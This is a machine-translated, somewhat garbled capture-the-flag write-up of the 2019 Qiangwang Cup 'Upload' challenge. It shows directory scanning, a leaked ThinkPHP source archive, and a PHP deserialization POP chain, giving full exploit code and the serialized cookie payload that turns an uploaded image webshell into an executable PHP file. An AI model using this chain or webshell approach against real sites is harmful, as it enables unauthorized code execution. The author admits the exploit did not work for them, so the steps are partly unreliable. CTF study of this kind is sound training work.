2019 Strong net cup upload

Let me write it out front ： This question , Put it aside and fold it buff Well ？

Upload files + Deserialization

The opening page is the familiar registration login page

Register and log in , Gave a file upload port , Upload a picture horse , View path

Generally, there will be a source code leak , Sometimes with SQL hook , Sometimes it's deserialization

dirsearch Scan directory

kali Of dirsearch The installation is detailed in another note , No more details here .

stay dirsearch Open the terminal input in the directory

python3 dirsearch -u URL -e* -t 20 -x 301,403,429,404,500,501
 explain ：
-e*   Scan the website for all script types 
-t 20  Set the scanning thread to 20
-x 301,403,429,404,500,501  Exclude the specified website status code , Separated by commas 
 Generally, the status code with background source code leakage is 200

In the root directory, I scanned www.tar.gz

download （ The file is quite large ）

thinkphp frame

use vscode open ,tp5 Next , There is still .idea Catalog

.idea Configuration information of stored items , Include history , A directory of version control information

Found to be thinkphp frame , The general core document is

application->web->controller

There are four here php file

Deserialization

See here user Of cookie Performed a deserialization operation .

First, when you visit most pages, you will call login_check Methods , First send the incoming user Profile Deserialization , Then check whether the relevant information is consistent in the database .

Register.php In the destructor, if you register, you can directly call index(), That is, jump to the home page .

Profile.php Are there in _call and _get Two magic methods , It describes what to do when calling non callable methods and non callable member variables ._get Directly from except Look inside ,_call Will call its own name The method referred to by the variable referred to by the member variable .

These two magic methods can be used .

I uploaded it directly png Pictures have no effect , If you upload other types of pictures, the horse will handle , Forcibly change the suffix to png.

Our thinking is , utilize filename_tmp and filename Parse the picture horse into php file , How can I parse it ,cookie It can be deserialized , You can finish the construction exp Serialized encoded incoming cookie, Revisit png The file can become php The file , Then use ant sword . How to construct it specifically , You can enter the following logic , It has filename、filename_tmp, Can also use img

But we need to bypass the above two judgments , As long as there is no assignment , Just don't upload variables .

utilize _get_call：except in ['index'=>'img']（ Array ） Implement a call index The variable goes to img Variable , Use img The logic is as long as ext Just exist , Because the following will call update_img(), So let img The variable is equal to upload_img() function , Trigger _call, It is exactly the function of these three logics , Successfully called .

How to call index Variable , Give Way registed=false That is to say registed If it doesn't exist, you can enter the logic of the destructor .

Here we can basically construct exp 了

exp structure

Pay attention to thinkphp In frame , Specify the namespace , Otherwise, I don't know which class to instantiate

<?php
namespace app\web\controller;// Specify the namespace 

class Profile{
    
    public $checker;
    public $filename_tmp;
    public $filename;
    public $upload_menu;
    public $ext;
    public $img;
    public $except;

    public function __get($name)
    {
    
        return $this->except[$name];//excep Specify that the passed in variable is an array 
    }

    public function __call($name, $arguments)
    {
    
        if($this->{
    $name}){
    
            $this->{
    $this->{
    $name}}($arguments);
        }
    }
}

class Register{
    
    public $checker;
    public $registed;

    public function __destruct()
    {
    
        if(!$this->registed){
    
            $this->checker->index();
        }
    }

}
$profile=new Profile();
$profile->except=array('index'=>'img');//['index'=>'img'] It can also represent arrays 
$profile->img='upload_img';
$profile->filename_tmp='../upload/c47b21fcf8f0bc8b3920541abd8024fd/4a47a0db6e60853dedfcfdf08a5ca249.png';
$profile->filename='../upload/c47b21fcf8f0bc8b3920541abd8024fd/4a47a0db6e60853dedfcfdf08a5ca249.php';
$profile->ext=true;

$register=new Register();
$register->registed=false;
$register->checker=$profile;
$register->checker->checker=0;// call pop Chain prevents exiting the program 

echo urlencode(base64_encode(serialize($register)));

Running results

TzoyNzoiYXBwXHdlYlxjb250cm9sbGVyXFJlZ2lzdGVyIjoyOntzOjc6ImNoZWNrZXIiO086MjY6ImFwcFx3ZWJcY29udHJvbGxlclxQcm9maWxlIjo3OntzOjc6ImNoZWNrZXIiO2k6MDtzOjEyOiJmaWxlbmFtZV90bXAiO3M6Nzk6Ii4uL3VwbG9hZC9jNDdiMjFmY2Y4ZjBiYzhiMzkyMDU0MWFiZDgwMjRmZC80YTQ3YTBkYjZlNjA4NTNkZWRmY2ZkZjA4YTVjYTI0OS5wbmciO3M6ODoiZmlsZW5hbWUiO3M6Nzk6Ii4uL3VwbG9hZC9jNDdiMjFmY2Y4ZjBiYzhiMzkyMDU0MWFiZDgwMjRmZC80YTQ3YTBkYjZlNjA4NTNkZWRmY2ZkZjA4YTVjYTI0OS5waHAiO3M6MTE6InVwbG9hZF9tZW51IjtOO3M6MzoiZXh0IjtiOjE7czozOiJpbWciO3M6MTA6InVwbG9hZF9pbWciO3M6NjoiZXhjZXB0IjthOjE6e3M6NToiaW5kZXgiO3M6MzoiaW1nIjt9fXM6ODoicmVnaXN0ZWQiO2I6MDt9

base64 Decoding

O:27:"app\web\controller\Register":2:{
    s:7:"checker";O:26:"app\web\controller\Profile":7:{
    s:7:"checker";i:0;s:12:"filename_tmp";s:79:"../upload/c47b21fcf8f0bc8b3920541abd8024fd/4a47a0db6e60853dedfcfdf08a5ca249.png";s:8:"filename";s:79:"../upload/c47b21fcf8f0bc8b3920541abd8024fd/4a47a0db6e60853dedfcfdf08a5ca249.php";s:11:"upload_menu";N;s:3:"ext";b:1;s:3:"img";s:10:"upload_img";s:6:"except";a:1:{
    s:5:"index";s:3:"img";}}s:8:"registed";b:0;}

Sure , very good , It's a shame

take flag

hold user Of cookie Change the value to the encoded result after running , Refresh the root directory several times , Revisit /upload/c47b21fcf8f0bc8b3920541abd8024fd/4a47a0db6e60853dedfcfdf08a5ca249.php You can find that it has been parsed into php file , Then use ant sword to connect .

Words written at the back ：

When I am actually operating , I don't know why , It can't be resolved into php file , There is no such document at all , Also prompt system operation error , I can't even go back to the original login page . Simply record this stack buff Let's go . Strong net cup , strong ！

Reference notes

[(44 Bar message ) Strong net cup 2019]Upload_penson by Xiao Wu's blog -CSDN Blog

[ Strong net cup 2019]Upload - KingBridge - Blog Garden (cnblogs.com)

[(44 Bar message ) BUUCTF： Strong net cup 2019]Upload_ At the end of the Early blog -CSDN Blog